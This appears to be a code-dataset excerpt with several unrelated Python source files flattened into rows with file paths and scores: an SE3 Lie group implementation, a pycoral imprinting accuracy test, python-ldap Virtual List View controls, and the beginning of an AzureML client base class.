See Eqs. (173) for SE3 specific implementation
Args:
J_t_m: Jacobian of the tagent wrt to self
Returns:
The log() map of self in vector form
"""
if J_t_m is not None:
J_t_m[...] = self.rjacinv()
p1, p2, p3 = (self.so3.rjacinv().T @ self.translation).tolist()
return np.array([p1, p2, p3, self.coeff[3], self.coeff[4], self.coeff[5]])
def adjoint(self) -> Adjoint:
"""Compute the adjoint of the transformation
See Eqs. (29)
See Eqs. (123) for SO2 specifics
"""
adj = np.identity(self.dof)
x, y, z = self.translation.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
adj[0:3, 0:3] = self.rotation
adj[0:3, 3:6] = skew @ self.rotation
adj[3:6, 3:6] = self.rotation
return adj | src/liegroups/se3.py | import random
import math
from functools import cached_property
import numpy as np
import numpy.typing as npt
from liegroups.base import (
LieGroupBase,
Adjoint,
Jacobian,
OptionalJacobian,
Tangent,
Vector,
eps,
)
from liegroups.so3 import SO3
from liegroups.util import normalize_range, norm, uniform_sampling_n_ball_muller, clip
class SE3(LieGroupBase):
dof = 6
dim = 3
def __init__(
self, x: float, y: float, z: float, theta1: float, theta2: float, theta3: float
):
"""
Initialize the SE2 group element using the angle of rotation in Radians and translation in x and y
Args:
x: the translation distance from the origin on the X axis
y: the translation distance from the origin on the Y axis
z: the translation distance from the origin on the Z axis
theta1: first element of the theta vector
theta2: second element of the theta vector
theta3: third element of theta vector
"""
# Normalize the theta vector so ||theta|| is between (0, PI]
theta = (
theta1,
theta2,
theta3,
)
theta_norm = norm(theta)
normalized_theta_norm = normalize_range(theta_norm, 0, math.pi)
if theta_norm != normalized_theta_norm:
theta = tuple(normalized_theta_norm * t / theta_norm for t in theta)
super().__init__(x, y, z, *theta)
self.so3 = SO3(*theta)
@classmethod
def identity(cls) -> LieGroupBase:
"""
Return the identity of the group
"""
return cls(0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
@classmethod
def random(cls) -> LieGroupBase:
"""
Return the a random element of the group
"""
theta = SO3.random().coeff
return cls(
random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1), *theta,
)
@cached_property
def rotation(self) -> np.ndarray:
"""
Return the matrix representation of the rotation
"""
return self.so3.matrix
@cached_property
def translation(self) -> np.ndarray:
"""
Return the matrix representation of the translation
"""
x = self.coeff[0]
y = self.coeff[1]
z = self.coeff[2]
return np.array([x, y, z])
@cached_property
def matrix(self) -> np.ndarray:
"""
Return the matrix representation of the Lie group element
See Eqs. (152)
"""
matrix = np.identity(self.dim + 1)
matrix[0:3, 0:3] = self.rotation
matrix[0:3, 3] = self.translation
return matrix
@classmethod
def from_matrix(cls, matrix: np.ndarray) -> LieGroupBase:
"""
Construct the Lie group element from its matrix representation
This method does not validate whether or not the matrix is well formed.
See Eqs. (152)
Args:
matrix: matrix representation of the SO2 group element.
Return:
The equivalent SO2 group
"""
theta = SO3.from_matrix(matrix[0:3, 0:3]).coeff
return cls(matrix[0][3], matrix[1][3], matrix[2][3], *theta)
def inverse(self, J_minv_m: OptionalJacobian = None) -> LieGroupBase:
"""Returns the inverse of the this Lie Group Object instance
See Eqs. (3) for general inverse
See Eqs. (154) for inverse specific to the SE2 group
See Eqs. (160) for the Jacobian of the inverse
Args:
J_minv_m: The Jacobian of the inverse with respect to self
Returns:
The inverese of self
"""
if J_minv_m is not None:
assert J_minv_m.shape == (self.dof, self.dof)
J_minv_m[...] = -self.adjoint()
trans_inv = (-self.rotation.T @ self.translation).tolist()
return self.__class__(
trans_inv[0],
trans_inv[1],
trans_inv[2],
-self.coeff[3],
-self.coeff[4],
-self.coeff[5],
)
def _compose(
self,
other: "SE3",
J_mc_ma: OptionalJacobian = None,
J_mc_mb: OptionalJacobian = None,
) -> LieGroupBase:
"""Returns the composition of self and another element of the same Lie group.
See Eqs. (1,2,3,4)
See Eqs. (155) for implementation specific to SE2
See Eqs. (161, 162) for Jacobian implementation
Args:
other: Another element of the same Lie group
J_mc_ma: The Jacobian of the composition wrt self
J_mc_mb: The Jacobian of the composition wrt other
Returns:
The composition of self and other (self @ Other)
"""
Ra = self.rotation
ta = self.translation
Rb = other.rotation
tb = other.translation
if J_mc_ma is not None:
x, y, z = tb.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
J_mc_ma[3][3] = 1
J_mc_ma[0:3, 0:3] = Rb.T
J_mc_ma[3:6, 3:6] = Rb.T
J_mc_ma[0:3, 3:6] = -Rb.T @ skew
if J_mc_mb is not None:
J_mc_mb[...] = np.identity(self.dof)
m = np.identity(self.dim + 1)
m[0:3, 0:3] = Ra @ Rb
m[0:3, 3] = ta + Ra @ tb
return self.__class__.from_matrix(m)
def act(
self,
vec: Vector,
J_vout_m: OptionalJacobian = None,
J_vout_v: OptionalJacobian = None,
) -> Vector:
"""Perform the action of the group on a point in the vector space
See Eqs. (165, 166, 167)
Args:
vec: A point in the vector space
J_vout_m: Jacobian of the output vector wrt to self
J_vout_v: Jacobian of the output vector wrt to vec
Returns:
A point acted on by the group
"""
if J_vout_m is not None:
x, y, z = vec.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
J_vout_m[0:3, 0:3] = self.rotation
J_vout_m[0:3, 3:6] = -self.rotation @ skew
if J_vout_v is not None:
J_vout_v[...] = self.rotation
return self.translation + self.rotation @ vec
@staticmethod
def q_matrix(p1, p2, p3, theta1, theta2, theta3) -> npt.NDArray:
theta = norm((theta1, theta2, theta3))
theta_sq = theta * theta
if math.isclose(theta, 0, abs_tol=eps):
# See https://ethaneade.com/lie_groups.pdf Eqs. (158, 160)
a = 0.5
b = 1 / 6 * (1 - theta_sq / 20 * (1 - theta_sq / 42 * (1 - theta_sq / 72)))
c = 1 / 24 * (1 - theta_sq / 30 * (1 - theta_sq / 56 * (1 - theta_sq / 90)))
d = (
1
/ 120
* (1 - theta_sq / 42 * (1 - theta_sq / 72 * (1 - theta_sq / 110)))
)
d = 1 / 2 * (c - 3 * d)
else:
a = 0.5
b = (theta - math.sin(theta)) / (theta_sq * theta)
c = (1 - theta_sq / 2 - math.cos(theta)) / (theta_sq * theta_sq)
d = (
1
/ 2
* (
c
- 3
* (theta - math.sin(theta) - theta_sq * theta / 6)
/ (theta_sq * theta_sq * theta)
)
)
p_x = np.array([[0, -p3, p2], [p3, 0, -p1], [-p2, p1, 0]])
theta_x = np.array(
[[0, -theta3, theta2], [theta3, 0, -theta1], [-theta2, theta1, 0]]
)
theta_x_sq = theta_x @ theta_x
return (
a * p_x
+ b * (theta_x @ p_x + p_x @ theta_x + theta_x @ p_x @ theta_x)
- c * (theta_x_sq @ p_x + p_x @ theta_x_sq - 3 * theta_x @ p_x @ theta_x)
- d * (theta_x @ p_x @ theta_x_sq + theta_x_sq @ p_x @ theta_x)
)
def rjac(self) -> Jacobian:
"""Compute the right jacobian of self
See Eqs. (41) for general computation
See Eqs. (179a) for SE3 specific
Remember J_r(theta) = J_l(-theta) where J_r(theta) and J_l(theta) are the left and right jacobian of the SO3 group
"""
jacobian = np.identity(self.dof)
jacobian[0:3, 0:3] = self.so3.rjac()
jacobian[3:6, 3:6] = self.so3.rjac()
jacobian[0:3, 3:6] = SE3.q_matrix(*(-self.log()).tolist())
return jacobian
def rjacinv(self) -> Jacobian:
"""Compute the inverse of right jacobian of self
See Eqs. (179b)
"""
jacobian = np.identity(self.dof)
jacobian[0:3, 0:3] = self.so3.rjacinv()
jacobian[3:6, 3:6] = self.so3.rjacinv()
jacobian[0:3, 3:6] = (
-self.so3.rjacinv()
@ SE3.q_matrix(*(-self.log()).tolist())
@ self.so3.rjacinv()
)
return jacobian
@classmethod
def exp(cls, tangent: Tangent, J_m_t: OptionalJacobian = None) -> LieGroupBase:
"""Compute the exponential map of the given tagent vector. The dimension of the vector should match the LieGroupBase.dof value
See Eqs. (23)
See Eqs. (173) for conversion between rho and t
Args:
J_m_t: Jacobian of the Lie group element wrt to the given tangent
Returns:
Exponential map of the tagent vector
"""
p1, p2, p3, theta1, theta2, theta3 = tangent.tolist()
so3 = SO3(theta1, theta2, theta3)
x, y, z = (so3.rjac().T @ np.array([p1, p2, p3])).tolist()
m = cls(x, y, z, theta1, theta2, theta3)
if J_m_t is not None:
J_m_t[...] = m.rjac()
return m
def log(self, J_t_m: OptionalJacobian = None) -> Tangent:
"""Compute the tagent vector of the transformation, it is equivalent to the inverse of exponential map
See Eqs. (24)
See Eqs. (173) for SE3 specific implementation
Args:
J_t_m: Jacobian of the tagent wrt to self
Returns:
The log() map of self in vector form
"""
if J_t_m is not None:
J_t_m[...] = self.rjacinv()
p1, p2, p3 = (self.so3.rjacinv().T @ self.translation).tolist()
return np.array([p1, p2, p3, self.coeff[3], self.coeff[4], self.coeff[5]])
def adjoint(self) -> Adjoint:
"""Compute the adjoint of the transformation
See Eqs. (29)
See Eqs. (123) for SO2 specifics
"""
adj = np.identity(self.dof)
x, y, z = self.translation.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
adj[0:3, 0:3] = self.rotation
adj[0:3, 3:6] = skew @ self.rotation
adj[3:6, 3:6] = self.rotation
return adj | 0.874814 | 0.682577 |
"""Evaluates the accuracy of imprinting based transfer learning model."""
import contextlib
import os
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
from pycoral.learn.imprinting.engine import ImprintingEngine
from pycoral.utils.edgetpu import make_interpreter
from tests import test_utils
import unittest
@contextlib.contextmanager
def test_image(path):
with open(path, 'rb') as f:
with Image.open(f) as image:
yield image
class ImprintingEngineEvaluationTest(unittest.TestCase):
def _transfer_learn_and_evaluate(self, model_path, keep_classes, dataset_path,
test_ratio, top_k_range):
"""Transfer-learns with given params and returns the evaluation result.
Args:
model_path: string, path of the base model.
keep_classes: bool, whether to keep base model classes.
dataset_path: string, path to the directory of dataset. The images should
be put under sub-directory named by category.
test_ratio: float, the ratio of images used for test.
top_k_range: int, top_k range to be evaluated. The function will return
accuracy from top 1 to top k.
Returns:
list of float numbers.
"""
engine = ImprintingEngine(model_path, keep_classes)
extractor = make_interpreter(engine.serialize_extractor_model())
extractor.allocate_tensors()
num_classes = engine.num_classes
print('--------------- Parsing dataset ----------------')
print('Dataset path:', dataset_path)
# train in fixed order to ensure the same evaluation result.
train_set, test_set = test_utils.prepare_data_set_from_directory(
dataset_path, test_ratio, True)
print('Image list successfully parsed! Number of Categories = ',
len(train_set))
print('--------------- Processing training data ----------------')
print('This process may take more than 30 seconds.')
train_input = []
labels_map = {}
for class_id, (category, image_list) in enumerate(train_set.items()):
print('Processing {} ({} images)'.format(category, len(image_list)))
train_input.append(
[os.path.join(dataset_path, category, image) for image in image_list])
labels_map[num_classes + class_id] = category
# train
print('---------------- Start training -----------------')
size = common.input_size(extractor)
for class_id, images in enumerate(train_input):
for image in images:
with test_image(image) as img:
common.set_input(extractor, img.resize(size, Image.NEAREST))
extractor.invoke()
engine.train(classify.get_scores(extractor),
class_id=num_classes + class_id)
print('---------------- Training finished -----------------')
with test_utils.temporary_file(suffix='.tflite') as output_model_path:
output_model_path.write(engine.serialize_model())
# Evaluate
print('---------------- Start evaluating -----------------')
classifier = make_interpreter(output_model_path.name)
classifier.allocate_tensors()
# top[i] represents number of top (i+1) correct inference.
top_k_correct_count = [0] * top_k_range
image_num = 0
for category, image_list in test_set.items():
n = len(image_list)
print('Evaluating {} ({} images)'.format(category, n))
for image_name in image_list:
with test_image(os.path.join(dataset_path, category,
image_name)) as img:
# Set threshold as a negative number to ensure we get top k
# candidates even if its score is 0.
size = common.input_size(classifier)
common.set_input(classifier, img.resize(size, Image.NEAREST))
classifier.invoke()
candidates = classify.get_classes(classifier, top_k=top_k_range)
for i in range(len(candidates)):
candidate = candidates[i]
if candidate.id in labels_map and \
labels_map[candidate.id] == category:
top_k_correct_count[i] += 1
break
image_num += n
for i in range(1, top_k_range):
top_k_correct_count[i] += top_k_correct_count[i - 1]
return [top_k_correct_count[i] / image_num for i in range(top_k_range)]
def _test_oxford17_flowers_single(self, model_path, keep_classes, expected):
top_k_range = len(expected)
ret = self._transfer_learn_and_evaluate(
test_utils.test_data_path(model_path), keep_classes,
test_utils.test_data_path('oxford_17flowers'), 0.25, top_k_range)
for i in range(top_k_range):
self.assertGreaterEqual(ret[i], expected[i])
# Evaluate with L2Norm full model, not keeping base model classes.
def test_oxford17_flowers_l2_norm_model_not_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=False,
expected=[0.86, 0.94, 0.96, 0.97, 0.97])
# Evaluate with L2Norm full model, keeping base model classes.
def test_oxford17_flowers_l2_norm_model_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=True,
expected=[0.86, 0.94, 0.96, 0.96, 0.97])
if __name__ == '__main__':
test_utils.coral_test_main() | tests/imprinting_evaluation_test.py | """Evaluates the accuracy of imprinting based transfer learning model."""
import contextlib
import os
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
from pycoral.learn.imprinting.engine import ImprintingEngine
from pycoral.utils.edgetpu import make_interpreter
from tests import test_utils
import unittest
@contextlib.contextmanager
def test_image(path):
with open(path, 'rb') as f:
with Image.open(f) as image:
yield image
class ImprintingEngineEvaluationTest(unittest.TestCase):
def _transfer_learn_and_evaluate(self, model_path, keep_classes, dataset_path,
test_ratio, top_k_range):
"""Transfer-learns with given params and returns the evaluation result.
Args:
model_path: string, path of the base model.
keep_classes: bool, whether to keep base model classes.
dataset_path: string, path to the directory of dataset. The images should
be put under sub-directory named by category.
test_ratio: float, the ratio of images used for test.
top_k_range: int, top_k range to be evaluated. The function will return
accuracy from top 1 to top k.
Returns:
list of float numbers.
"""
engine = ImprintingEngine(model_path, keep_classes)
extractor = make_interpreter(engine.serialize_extractor_model())
extractor.allocate_tensors()
num_classes = engine.num_classes
print('--------------- Parsing dataset ----------------')
print('Dataset path:', dataset_path)
# train in fixed order to ensure the same evaluation result.
train_set, test_set = test_utils.prepare_data_set_from_directory(
dataset_path, test_ratio, True)
print('Image list successfully parsed! Number of Categories = ',
len(train_set))
print('--------------- Processing training data ----------------')
print('This process may take more than 30 seconds.')
train_input = []
labels_map = {}
for class_id, (category, image_list) in enumerate(train_set.items()):
print('Processing {} ({} images)'.format(category, len(image_list)))
train_input.append(
[os.path.join(dataset_path, category, image) for image in image_list])
labels_map[num_classes + class_id] = category
# train
print('---------------- Start training -----------------')
size = common.input_size(extractor)
for class_id, images in enumerate(train_input):
for image in images:
with test_image(image) as img:
common.set_input(extractor, img.resize(size, Image.NEAREST))
extractor.invoke()
engine.train(classify.get_scores(extractor),
class_id=num_classes + class_id)
print('---------------- Training finished -----------------')
with test_utils.temporary_file(suffix='.tflite') as output_model_path:
output_model_path.write(engine.serialize_model())
# Evaluate
print('---------------- Start evaluating -----------------')
classifier = make_interpreter(output_model_path.name)
classifier.allocate_tensors()
# top[i] represents number of top (i+1) correct inference.
top_k_correct_count = [0] * top_k_range
image_num = 0
for category, image_list in test_set.items():
n = len(image_list)
print('Evaluating {} ({} images)'.format(category, n))
for image_name in image_list:
with test_image(os.path.join(dataset_path, category,
image_name)) as img:
# Set threshold as a negative number to ensure we get top k
# candidates even if its score is 0.
size = common.input_size(classifier)
common.set_input(classifier, img.resize(size, Image.NEAREST))
classifier.invoke()
candidates = classify.get_classes(classifier, top_k=top_k_range)
for i in range(len(candidates)):
candidate = candidates[i]
if candidate.id in labels_map and \
labels_map[candidate.id] == category:
top_k_correct_count[i] += 1
break
image_num += n
for i in range(1, top_k_range):
top_k_correct_count[i] += top_k_correct_count[i - 1]
return [top_k_correct_count[i] / image_num for i in range(top_k_range)]
def _test_oxford17_flowers_single(self, model_path, keep_classes, expected):
top_k_range = len(expected)
ret = self._transfer_learn_and_evaluate(
test_utils.test_data_path(model_path), keep_classes,
test_utils.test_data_path('oxford_17flowers'), 0.25, top_k_range)
for i in range(top_k_range):
self.assertGreaterEqual(ret[i], expected[i])
# Evaluate with L2Norm full model, not keeping base model classes.
def test_oxford17_flowers_l2_norm_model_not_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=False,
expected=[0.86, 0.94, 0.96, 0.97, 0.97])
# Evaluate with L2Norm full model, keeping base model classes.
def test_oxford17_flowers_l2_norm_model_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=True,
expected=[0.86, 0.94, 0.96, 0.96, 0.97])
if __name__ == '__main__':
test_utils.coral_test_main() | 0.874158 | 0.559651 |
__all__ = [
'VLVRequestControl',
'VLVResponseControl',
]
import ldap
from ldap.ldapobject import LDAPObject
from ldap.controls import (RequestControl, ResponseControl,
KNOWN_RESPONSE_CONTROLS, DecodeControlTuples)
from pyasn1.type import univ, namedtype, tag, namedval, constraint
from pyasn1.codec.ber import encoder, decoder
class ByOffsetType(univ.Sequence):
tagSet = univ.Sequence.tagSet.tagImplicitly(
tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))
componentType = namedtype.NamedTypes(
namedtype.NamedType('offset', univ.Integer()),
namedtype.NamedType('contentCount', univ.Integer()))
class TargetType(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('byOffset', ByOffsetType()),
namedtype.NamedType('greaterThanOrEqual', univ.OctetString().subtype(
implicitTag=tag.Tag(tag.tagClassContext,
tag.tagFormatSimple, 1))))
class VirtualListViewRequestType(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('beforeCount', univ.Integer()),
namedtype.NamedType('afterCount', univ.Integer()),
namedtype.NamedType('target', TargetType()),
namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVRequestControl(RequestControl):
controlType = '2.16.840.1.113730.3.4.9'
def __init__(
self,
criticality=False,
before_count=0,
after_count=0,
offset=None,
content_count=None,
greater_than_or_equal=None,
context_id=None,
):
RequestControl.__init__(self,self.controlType,criticality)
assert (offset is not None and content_count is not None) or \
greater_than_or_equal, \
ValueError(
'offset and content_count must be set together or greater_than_or_equal must be used'
)
self.before_count = before_count
self.after_count = after_count
self.offset = offset
self.content_count = content_count
self.greater_than_or_equal = greater_than_or_equal
self.context_id = context_id
def encodeControlValue(self):
p = VirtualListViewRequestType()
p.setComponentByName('beforeCount', self.before_count)
p.setComponentByName('afterCount', self.after_count)
if self.offset is not None and self.content_count is not None:
by_offset = ByOffsetType()
by_offset.setComponentByName('offset', self.offset)
by_offset.setComponentByName('contentCount', self.content_count)
target = TargetType()
target.setComponentByName('byOffset', by_offset)
elif self.greater_than_or_equal:
target = TargetType()
target.setComponentByName('greaterThanOrEqual',
self.greater_than_or_equal)
else:
raise NotImplementedError
p.setComponentByName('target', target)
return encoder.encode(p)
KNOWN_RESPONSE_CONTROLS[VLVRequestControl.controlType] = VLVRequestControl
class VirtualListViewResultType(univ.Enumerated):
namedValues = namedval.NamedValues(
('success', 0),
('operationsError', 1),
('protocolError', 3),
('unwillingToPerform', 53),
('insufficientAccessRights', 50),
('adminLimitExceeded', 11),
('innapropriateMatching', 18),
('sortControlMissing', 60),
('offsetRangeError', 61),
('other', 80),
)
class VirtualListViewResponseType(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('targetPosition', univ.Integer()),
namedtype.NamedType('contentCount', univ.Integer()),
namedtype.NamedType('virtualListViewResult',
VirtualListViewResultType()),
namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVResponseControl(ResponseControl):
controlType = '2.16.840.1.113730.3.4.10'
def __init__(self,criticality=False):
ResponseControl.__init__(self,self.controlType,criticality)
def decodeControlValue(self,encoded):
p, rest = decoder.decode(encoded, asn1Spec=VirtualListViewResponseType())
assert not rest, 'all data could not be decoded'
self.targetPosition = int(p.getComponentByName('targetPosition'))
self.contentCount = int(p.getComponentByName('contentCount'))
virtual_list_view_result = p.getComponentByName('virtualListViewResult')
self.virtualListViewResult = int(virtual_list_view_result)
context_id = p.getComponentByName('contextID')
if context_id.hasValue():
self.contextID = str(context_id)
else:
self.contextID = None
# backward compatibility class attributes
self.target_position = self.targetPosition
self.content_count = self.contentCount
self.result = self.virtualListViewResult
self.context_id = self.contextID
KNOWN_RESPONSE_CONTROLS[VLVResponseControl.controlType] = VLVResponseControl | lib/python3.7/site-packages/ldap/controls/vlv.py | __all__ = [
'VLVRequestControl',
'VLVResponseControl',
]
import ldap
from ldap.ldapobject import LDAPObject
from ldap.controls import (RequestControl, ResponseControl,
KNOWN_RESPONSE_CONTROLS, DecodeControlTuples)
from pyasn1.type import univ, namedtype, tag, namedval, constraint
from pyasn1.codec.ber import encoder, decoder
class ByOffsetType(univ.Sequence):
tagSet = univ.Sequence.tagSet.tagImplicitly(
tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))
componentType = namedtype.NamedTypes(
namedtype.NamedType('offset', univ.Integer()),
namedtype.NamedType('contentCount', univ.Integer()))
class TargetType(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('byOffset', ByOffsetType()),
namedtype.NamedType('greaterThanOrEqual', univ.OctetString().subtype(
implicitTag=tag.Tag(tag.tagClassContext,
tag.tagFormatSimple, 1))))
class VirtualListViewRequestType(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('beforeCount', univ.Integer()),
namedtype.NamedType('afterCount', univ.Integer()),
namedtype.NamedType('target', TargetType()),
namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVRequestControl(RequestControl):
controlType = '2.16.840.1.113730.3.4.9'
def __init__(
self,
criticality=False,
before_count=0,
after_count=0,
offset=None,
content_count=None,
greater_than_or_equal=None,
context_id=None,
):
RequestControl.__init__(self,self.controlType,criticality)
assert (offset is not None and content_count is not None) or \
greater_than_or_equal, \
ValueError(
'offset and content_count must be set together or greater_than_or_equal must be used'
)
self.before_count = before_count
self.after_count = after_count
self.offset = offset
self.content_count = content_count
self.greater_than_or_equal = greater_than_or_equal
self.context_id = context_id
def encodeControlValue(self):
p = VirtualListViewRequestType()
p.setComponentByName('beforeCount', self.before_count)
p.setComponentByName('afterCount', self.after_count)
if self.offset is not None and self.content_count is not None:
by_offset = ByOffsetType()
by_offset.setComponentByName('offset', self.offset)
by_offset.setComponentByName('contentCount', self.content_count)
target = TargetType()
target.setComponentByName('byOffset', by_offset)
elif self.greater_than_or_equal:
target = TargetType()
target.setComponentByName('greaterThanOrEqual',
self.greater_than_or_equal)
else:
raise NotImplementedError
p.setComponentByName('target', target)
return encoder.encode(p)
KNOWN_RESPONSE_CONTROLS[VLVRequestControl.controlType] = VLVRequestControl
class VirtualListViewResultType(univ.Enumerated):
namedValues = namedval.NamedValues(
('success', 0),
('operationsError', 1),
('protocolError', 3),
('unwillingToPerform', 53),
('insufficientAccessRights', 50),
('adminLimitExceeded', 11),
('innapropriateMatching', 18),
('sortControlMissing', 60),
('offsetRangeError', 61),
('other', 80),
)
class VirtualListViewResponseType(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('targetPosition', univ.Integer()),
namedtype.NamedType('contentCount', univ.Integer()),
namedtype.NamedType('virtualListViewResult',
VirtualListViewResultType()),
namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVResponseControl(ResponseControl):
controlType = '2.16.840.1.113730.3.4.10'
def __init__(self,criticality=False):
ResponseControl.__init__(self,self.controlType,criticality)
def decodeControlValue(self,encoded):
p, rest = decoder.decode(encoded, asn1Spec=VirtualListViewResponseType())
assert not rest, 'all data could not be decoded'
self.targetPosition = int(p.getComponentByName('targetPosition'))
self.contentCount = int(p.getComponentByName('contentCount'))
virtual_list_view_result = p.getComponentByName('virtualListViewResult')
self.virtualListViewResult = int(virtual_list_view_result)
context_id = p.getComponentByName('contextID')
if context_id.hasValue():
self.contextID = str(context_id)
else:
self.contextID = None
# backward compatibility class attributes
self.target_position = self.targetPosition
self.content_count = self.contentCount
self.result = self.virtualListViewResult
self.context_id = self.contextID
KNOWN_RESPONSE_CONTROLS[VLVResponseControl.controlType] = VLVResponseControl | 0.624408 | 0.245277 |
import sys
from contextlib import contextmanager
from inspect import getmembers, isroutine
from logging import getLogger, StreamHandler, INFO
from warnings import warn
try: # python 3+
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
try: # python 3.5+
from typing import Dict, List, Callable, Union, Optional
from logging import Logger
except ImportError:
pass
from decopatch import function_decorator, DECORATED
from makefun import wraps
from requests import Session
import pandas as pd
from azmlclient.clients_callmodes import CallMode, Batch, RequestResponse, LocalCallMode
from azmlclient.clients_config import ClientConfig
from azmlclient.utils_requests import debug_requests
# default logger that may be used by clients
default_logger = getLogger('azmlclient')
ch = StreamHandler(sys.stdout)
default_logger.addHandler(ch)
default_logger.setLevel(INFO)
AZML_SERVICE_ID = '__azml_service__'
class LocalCallModeNotAllowed(Exception):
"""
Exception raised when users call a method corresponding to a
"""
__slots__ = 'f',
def __init__(self, f):
self.f = f
super(LocalCallModeNotAllowed, self).__init__()
def __str__(self):
return repr(self)
def __repr__(self):
azml_service_name = get_azureml_service_name(self.f)
return "function '%s' (service '%s') is remote-only and can not be executed in local mode " \
"(`allow_local=False`). Please change call mode to request-response or batch before using it." \
% (self.f.__name__, azml_service_name)
@function_decorator
def azureml_service(service_name=None, # type: str
remote_only=False, # type: bool
f=DECORATED,
):
"""
A decorator for methods in your `AzureMLClient` subclasses, that you should use to indicate that a given method
corresponds to an AzureML service. That way, the `AzureMLClient` base class will be able to link this method
with local implementation and with the service configuration (url, api key).
This decorator performs two things:
- It wraps the decorated method into a method able to route "local"-mode calls to `self.call_local_service`
- It adds the `AZML_SERVICE_ID` attribute with the `service_name` so that the method is known as being
AzureML-related, and therefore the appropriate service configuration can be looked up.
:param service_name: the optional service name appearing in the `AzureMLClient` configuration (`ClientConfig`). By
default this is `None` and means that the method name should be used as the service name.
:param remote_only: a boolean (default False) indicating if a service should be considered remote-only. If True, an
appropriate exception will be raised if the service is used in local mode.
"""
@wraps(f)
def f_wrapper(self, # type: AzureMLClient
*args,
**kwargs):
"""
:param self:
:param args:
:param kwargs:
:return:
"""
if self.is_local_mode():
if not remote_only:
# execute the same method on local implementor rather than client.
return self.call_local_service(f.__name__, *args, **kwargs)
else:
raise LocalCallModeNotAllowed(f_wrapper)
else:
# execute as usual
return f(self, *args, **kwargs)
# tag the method as being related to an AzureML service with given id
setattr(f_wrapper, AZML_SERVICE_ID, service_name)
return f_wrapper
def get_azureml_service_name(f):
"""
Returns the AzureML service name associated with method `f`.
:param f:
:return:
"""
try:
# If this is the bound (=instance) method, get the unbound (=class) one
if hasattr(f, '__func__'):
f = f.__func__
azml_name = getattr(f, AZML_SERVICE_ID)
except AttributeError:
raise ValueError("Method '%s' can not be bound to an AzureML service, please decorate it with "
"@azureml_service." % f.__name__)
else:
return azml_name if azml_name is not None else f.__name__
class AzureMLClient:
"""
Base class for AzureML clients.
A client is configured with a mandatory `ClientConfig` object describing global and per-service options (endpoint
urls, api keys).
It provides a way to create them from a configuration containing endpoint definitions,
and to declare a local implementation
"""
def __init__(self,
client_config, # type: ClientConfig
logger=default_logger, # type: Logger
default_call_mode=None, # type: CallMode
requests_session=None, # type: Session
auto_close_session=None # type: bool
):
"""
Creates an `AzureMLClient` with an initial `ClientConfig` containing the global and per-service configurations.
Constructor with a global configuration and service endpoint configurations. The service endpoint
configurations should be provided in a dictionary with keys being the service names. Only names declared in the
'services' meta attribute of the class will be accepted, otherwise and error will be raised. Note that you may
provide configurations for some services only.
A `requests.Session` object is automatically created when the client is created, and possibly configured with
the proxy information obtained from the `ClientConfig`. The `Session` is automatically closed when the client
instance is garbaged out. A custom `Session` can be passed to the constructor instead. It won't be closed nor
configured by default, the user should do it (using `session.close()` and `<config>.configure_session(session)`
respectively).
:param client_config: a configuration for this component client. It should be valid = contain sections for
each service in this client. The configuration can contain proxy information, in which case it will
be used to configure the underlying requests Session that is created.
:param logger:
:param default_call_mode: (advanced) if a non-None `CallMode` instance is provided, it will be used as the
default call mode for this client. Otherwise by default a request-response call mode will be set as the
default call mode (`RequestResponse()`)
:param requests_session: (advanced) an optional `Session` object to use (from `requests` lib). If `None` is
provided, a new `Session` will be used, possibly configured with the proxy information in the `ClientConfig`
and deleted when this object is garbaged out. If a custom object is provided, you should close it yourself
or switch `auto_close_session` to `True` explicitly. You should also configure it yourself, for example
with `<config>.configure_session(session)`.
:param auto_close_session: an optional boolean indicating if `self.session` should be closed when this object
is garbaged out. By default this is `None` and means "`True` if no custom `requests_session` is passed, else
`False`"). Turning this to `False` can leave hanging Sockets unclosed.
"""
# save the attributes
self.client_config = client_config
self.logger = logger
if default_call_mode is None:
# by default make this a request response
default_call_mode = RequestResponse()
self._current_call_mode = default_call_mode
# init the local impl property
self._local_impl = None
if requests_session is None:
# create and configure a session
self.session = Session()
self.global_cfg.configure_session(self.session)
else:
# custom provided : do not configure it
self.session = requests_session
# auto-close behaviour
if auto_close_session is None:
# default: only auto-close if this session was created by us.
auto_close_session = requests_session is None
self.auto_close_session = auto_close_session
def __del__(self):
"""
This is called when the garbage collector deletes this object.
Let's use this opportunity to close the requests Session to avoid
leaving hanging Sockets, see https://github.com/smarie/python-odsclient/issues/27
"""
if self.auto_close_session and self.session is not None:
try:
# close the underlying `requests.Session`
self.session.close()
except Exception as e:
warn("Error while closing session: %r" % e)
# --------- remote service calls implementation
@property
def service_methods(self):
"""
returns a dictionary of all service methods referenced by AzureML service name.
These are all methods in the class that have been decorated with `@azureml_service`
:return:
"""
return {get_azureml_service_name(v[1]): v[1]
for v in getmembers(self.__class__, predicate=lambda x: isroutine(x) and hasattr(x, AZML_SERVICE_ID))}
@property
def service_names(self):
"""
Returns the list of all service names - basically the names of the `service_methods`
:return:
